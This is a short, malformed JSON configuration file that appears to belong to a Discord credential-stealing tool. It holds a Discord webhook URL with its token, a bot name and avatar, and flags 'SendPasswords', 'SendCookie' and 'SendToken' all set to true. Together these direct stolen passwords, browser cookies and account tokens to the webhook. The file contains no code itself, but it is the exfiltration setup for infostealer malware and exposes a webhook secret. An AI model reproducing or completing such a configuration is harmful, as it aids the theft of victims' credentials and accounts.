{
    "Title_Configs":[
        {

           "name": "Karon13",
           "servername": "WorldLeague",
           "program": "KaronGoodmind"

        }
    ],

    "Webhook_config":[https://discord.com/api/webhooks/1438935259906314353/QNE0E4_x52OxAsSDHN6t2CTd4f-w_A94qoeyDK-rqgQ84wRRFCIFdTWpPILVB444hc7p
        {

          "Bot_Name": "Karon13",
          "Bot_Avatar": "https://media.discordapp.net/attachments/818904459681071126/1008774401648505013/goat6.jpg"
  
        }
    ],

    "Other_Configs":[
        {
          "SendPasswords": true,
          "SendCookie": true,
          "SendToken": true
        }
    ]


}

